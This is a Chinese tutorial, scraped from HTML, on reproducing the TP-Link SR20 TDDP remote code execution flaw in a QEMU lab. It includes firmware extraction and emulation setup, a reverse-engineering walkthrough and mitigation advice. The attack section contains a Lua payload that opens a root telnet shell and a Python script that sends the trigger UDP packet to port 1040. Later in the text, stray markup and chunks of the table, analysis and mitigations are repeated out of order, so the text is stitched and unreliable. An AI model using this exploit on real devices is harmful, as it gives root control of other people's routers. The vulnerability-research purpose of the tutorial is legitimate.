TP-Link SR20 RCE漏洞复现与分析教学文档<\/h1>

1. 漏洞概述<\/h2>
TP-Link SR20是一款支持Zigbee和Z-Wave物联网协议的触屏Wi-Fi路由器，可作为智能家居控制中枢。该设备存在一个严重的远程代码执行(RCE)漏洞，允许攻击者在设备上以root权限执行任意命令。<\/p>

漏洞关键点：<\/h3>

漏洞存在于TP-Link设备调试协议(TDDP)中<\/li>
TDDP是TP-Link专利的调试协议，基于UDP运行在1040端口<\/li>
SR20运行的是V1版本TDDP协议，无需认证<\/li>
攻击者只需向UDP 1040端口发送特定格式数据(第二字节为0x31)<\/li>

设备会连接攻击者的TFTP服务下载文件并使用LUA解释器以root权限执行<\/li> <\/ul>

2. 环境准备<\/h2>

2.1 固件获取与提取<\/h3>

从官网下载TP-Link SR20固件(选择SR20(US)_V1_180518版本)<\/p> <\/li>

使用binwalk分析固件：<\/p>

binwalk SR20(US)_V1_180518.bin
<\/code><\/pre>
输出显示：<\/p>

两段LZMA压缩数据<\/li>
TRX固件头部(1941504字节)<\/li>
Squashfs文件系统(xz压缩，13,061,274字节，2642个inode)<\/li>
<\/ul>
<\/li>

提取文件系统：<\/p>
binwalk -e SR20(US)_V1_180518.bin
<\/code><\/pre>
提取的文件位于_SR20(US)_V1_180518.bin.extracted\/squashfs-root<\/code><\/p>
<\/li>
<\/ol>
2.2 QEMU环境搭建<\/h3>


安装QEMU：<\/p>
sudo apt-get install qemu qemu-system qemu-user-static
<\/code><\/pre>
<\/li>

下载Debian ARM系统文件：<\/p>

内核文件(vmlinuz)<\/li>
初始内存磁盘(initrd.gz)<\/li>
根文件系统(debian-armhf.qcow2)<\/li>
<\/ul>
<\/li>

创建TAP虚拟网卡：<\/p>
sudo ip tuntap add tap0 mode tap
sudo ip addr add 10.10.10.1\/24 dev tap0
sudo ip link set tap0 up
<\/code><\/pre>
<\/li>

创建启动脚本(start.sh)：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress \
<\/span><\/span><\/span><\/span>-initrd initrd.img-3.2.0-4-vexpress \
<\/span><\/span><\/span><\/span>-drive if<\/span>=<\/span>sd,file=<\/span>debian-armhf.qcow2 \
<\/span><\/span><\/span><\/span>-append "root=\/dev\/mmcblk0p2 console=ttyAMA0"<\/span> \
<\/span><\/span><\/span><\/span>-net nic -net tap,ifname=<\/span>tap0,script=<\/span>no,downscript=<\/span>no \
<\/span><\/span><\/span><\/span>-nographic
<\/span><\/span><\/code><\/pre><\/li>

启动QEMU虚拟机，使用root\/root登录<\/p>
<\/li>
<\/ol>
2.3 文件系统挂载<\/h3>


压缩固件文件系统：<\/p>
tar -czvf fs.tar.gz squashfs-root\/
<\/code><\/pre>
<\/li>

在QEMU虚拟机中：<\/p>
wget http:\/\/宿主机IP:8000\/fs.tar.gz
tar -xzvf fs.tar.gz
<\/code><\/pre>
<\/li>

挂载文件系统：<\/p>
mount -o bind \/dev squashfs-root\/dev
mount -t proc \/proc squashfs-root\/proc
chroot squashfs-root \/bin\/sh
<\/code><\/pre>
<\/li>
<\/ol>
2.4 TFTP服务搭建<\/h3>


安装atftpd：<\/p>
sudo apt-get install atftpd
<\/code><\/pre>
<\/li>

修改配置文件(\/etc\/default\/atftpd)：<\/p>
USE_INETD=false
OPTIONS="--tftpd-timeout 300 --retry-timeout 5 --mcast-port 1758 --mcast-addr 239.239.239.0-255 --mcast-ttl 1 --maxthread 100 --verbose=5 \/tftpboot"
<\/code><\/pre>
<\/li>

创建TFTP目录：<\/p>
sudo mkdir \/tftpboot
sudo chown -R nobody \/tftpboot
<\/code><\/pre>
<\/li>

重启服务：<\/p>
sudo systemctl stop inetutils-inetd.service
sudo systemctl restart atftpd
<\/code><\/pre>
<\/li>
<\/ol>
3. 漏洞复现<\/h2>
3.1 准备Payload<\/h3>
在\/tftpboot目录下创建config_system.lua文件，内容如下：<\/p>
function<\/span> config_test<\/span>()
<\/span><\/span>    os.execute("telnetd -l \/bin\/sh -p 4242"<\/span>)
<\/span><\/span>end<\/span>
<\/span><\/span><\/code><\/pre>3.2 复现步骤<\/h3>


在QEMU虚拟机中启动tddp程序：<\/p>
\/usr\/bin\/tddp
<\/code><\/pre>
<\/li>

在宿主机上使用netcat监听4242端口：<\/p>
nc -lvnp 4242
<\/code><\/pre>
<\/li>

执行POC脚本(或手动构造数据包)：<\/p>
import<\/span> socket
<\/span><\/span>
<\/span><\/span>target_ip =<\/span> "10.10.10.2"<\/span>  # QEMU虚拟机IP<\/span>
<\/span><\/span>target_port =<\/span> 1040<\/span>
<\/span><\/span>
<\/span><\/span># 构造恶意数据包<\/span>
<\/span><\/span>payload =<\/span> b<\/span>"<\/span>\x01\x31<\/span>"<\/span> +<\/span> b<\/span>"<\/span>\x00<\/span>"<\/span>*<\/span>14<\/span>  # 第二字节为0x31<\/span>
<\/span><\/span>
<\/span><\/span>sock =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_DGRAM)
<\/span><\/span>sock.<\/span>sendto(payload, (target_ip, target_port))
<\/span><\/span><\/code><\/pre><\/li>

连接telnet获取shell：<\/p>
telnet 10.10.10.2 4242
<\/code><\/pre>
<\/li>
<\/ol>
4. 漏洞分析<\/h2>
4.1 TDDP协议格式<\/h3>



偏移<\/th>
字段名<\/th>
长度<\/th>
描述<\/th>
<\/tr>
<\/thead>


0x00<\/td>
Ver<\/td>
1字节<\/td>
协议版本(1或2)<\/td>
<\/tr>

0x01<\/td>
Type<\/td>
1字节<\/td>
报文类型<\/td>
<\/tr>

0x02<\/td>
Code<\/td>
1字节<\/td>
请求\/响应类型<\/td>
<\/tr>

0x03<\/td>
ReplyInfo<\/td>
1字节<\/td>
返回信息<\/td>
<\/tr>

0x04<\/td>
PktLength<\/td>
2字节<\/td>
数据长度<\/td>
<\/tr>

0x06<\/td>
PktID<\/td>
2字节<\/td>
报文ID<\/td>
<\/tr>

0x08<\/td>
SubType<\/td>
1字节<\/td>
子类型<\/td>
<\/tr>

0x09<\/td>
Reserve<\/td>
7字节<\/td>
保留字段<\/td>
<\/tr>

0x10<\/td>
Digest<\/td>
16字节<\/td>
MD5摘要<\/td>
<\/tr>
<\/tbody>
<\/table>
4.2 逆向分析<\/h3>


main函数<\/strong> (sub_971C)：<\/p>

初始化tddp结构体<\/li>
创建socket并绑定地址<\/li>
设置flags和时间<\/li>
调用tddp_func<\/li>
<\/ul>
<\/li>

tddp_func<\/strong>：<\/p>

初始化接收\/发送缓冲区<\/li>
使用recvfrom接收数据<\/li>
初始化LUA环境<\/li>
根据协议版本调用不同函数(此处调用tddp_version_1_func)<\/li>
<\/ul>
<\/li>

tddp_version_1_func<\/strong>：<\/p>

根据数据包中的Type字段选择处理函数<\/li>
漏洞点在0x31(CMD_FTEST_CONFIG)处理分支<\/li>
<\/ul>
<\/li>

CMD_FTEST_CONFIG处理<\/strong>：<\/p>

进入\/tmp目录<\/li>
使用tftp获取lua文件<\/li>
加载lua库<\/li>
调用config_test函数<\/li>
使用lua_call执行lua脚本(无任何过滤)<\/li>
<\/ul>
<\/li>
<\/ol>
5. 漏洞利用限制<\/h2>

TDDP服务可能只能通过有线网络访问，Wi-Fi无法访问<\/li>
需要设备开启1040\/UDP端口<\/li>
攻击者需要能够向目标发送UDP数据包<\/li>
<\/ol>
6. 参考链接<\/h2>

TP-Link SR20固件下载页面<\/li>
Debian ARM镜像下载<\/li>
QEMU官方文档<\/li>
atftpd配置指南<\/li>
<\/ol>
7. 防护建议<\/h2>

禁用TDDP服务(如果不需要)<\/li>
防火墙规则阻止1040\/UDP端口<\/li>
升级到修复漏洞的固件版本<\/li>
使用网络分段隔离物联网设备<\/li>
<\/ol>

偏移<\/th>	字段名<\/th>	长度<\/th>	描述<\/th> <\/tr> <\/thead>
0x00<\/td>	Ver<\/td>	1字节<\/td>	协议版本(1或2)<\/td> <\/tr>
0x01<\/td>	Type<\/td>	1字节<\/td>	报文类型<\/td> <\/tr>
0x02<\/td>	Code<\/td>	1字节<\/td>	请求\/响应类型<\/td> <\/tr>
0x03<\/td>	ReplyInfo<\/td>	1字节<\/td>	返回信息<\/td> <\/tr>
0x04<\/td>	PktLength<\/td>	2字节<\/td>	数据长度<\/td> <\/tr>
0x06<\/td>	PktID<\/td>	2字节<\/td>	报文ID<\/td> <\/tr>
0x08<\/td>	SubType<\/td>	1字节<\/td>	子类型<\/td> <\/tr>
0x09<\/td>	Reserve<\/td>	7字节<\/td>	保留字段<\/td> <\/tr>
0x10<\/td>	Digest<\/td>	16字节<\/td>	MD5摘要<\/td> <\/tr> <\/tbody> <\/table> 4.2 逆向分析<\/h3> main函数<\/strong> (sub_971C)：<\/p> 初始化tddp结构体<\/li> 创建socket并绑定地址<\/li> 设置flags和时间<\/li> 调用tddp_func<\/li> <\/ul> <\/li> tddp_func<\/strong>：<\/p> 初始化接收\/发送缓冲区<\/li> 使用recvfrom接收数据<\/li> 初始化LUA环境<\/li> 根据协议版本调用不同函数(此处调用tddp_version_1_func)<\/li> <\/ul> <\/li> tddp_version_1_func<\/strong>：<\/p> 根据数据包中的Type字段选择处理函数<\/li> 漏洞点在0x31(CMD_FTEST_CONFIG)处理分支<\/li> <\/ul> <\/li> CMD_FTEST_CONFIG处理<\/strong>：<\/p> 进入\/tmp目录<\/li> 使用tftp获取lua文件<\/li> 加载lua库<\/li> 调用config_test函数<\/li> 使用lua_call执行lua脚本(无任何过滤)<\/li> <\/ul> <\/li> <\/ol> 5. 漏洞利用限制<\/h2> TDDP服务可能只能通过有线网络访问，Wi-Fi无法访问<\/li> 需要设备开启1040\/UDP端口<\/li> 攻击者需要能够向目标发送UDP数据包<\/li> <\/ol> 6. 参考链接<\/h2> TP-Link SR20固件下载页面<\/li> Debian ARM镜像下载<\/li> QEMU官方文档<\/li> atftpd配置指南<\/li> <\/ol> 7. 防护建议<\/h2> 禁用TDDP服务(如果不需要)<\/li> 防火墙规则阻止1040\/UDP端口<\/li> 升级到修复漏洞的固件版本<\/li> 使用网络分段隔离物联网设备<\/li> <\/ol>

TP-Link SR20 RCE漏洞复现与分析教学文档<\/h1>

1. 漏洞概述<\/h2> TP-Link SR20是一款支持Zigbee和Z-Wave物联网协议的触屏Wi-Fi路由器，可作为智能家居控制中枢。该设备存在一个严重的远程代码执行(RCE)漏洞，允许攻击者在设备上以root权限执行任意命令。<\/p>

2. 环境准备<\/h2>

3. 漏洞复现<\/h2>

4. 漏洞分析<\/h2>

7. 防护建议<\/h2> 禁用TDDP服务(如果不需要)<\/li> 防火墙规则阻止1040\/UDP端口<\/li> 升级到修复漏洞的固件版本<\/li> 使用网络分段隔离物联网设备<\/li> <\/ol>

1. 漏洞概述<\/h2>
TP-Link SR20是一款支持Zigbee和Z-Wave物联网协议的触屏Wi-Fi路由器，可作为智能家居控制中枢。该设备存在一个严重的远程代码执行(RCE)漏洞，允许攻击者在设备上以root权限执行任意命令。<\/p>

7. 防护建议<\/h2>

禁用TDDP服务(如果不需要)<\/li>
防火墙规则阻止1040\/UDP端口<\/li>
升级到修复漏洞的固件版本<\/li>
使用网络分段隔离物联网设备<\/li> <\/ol>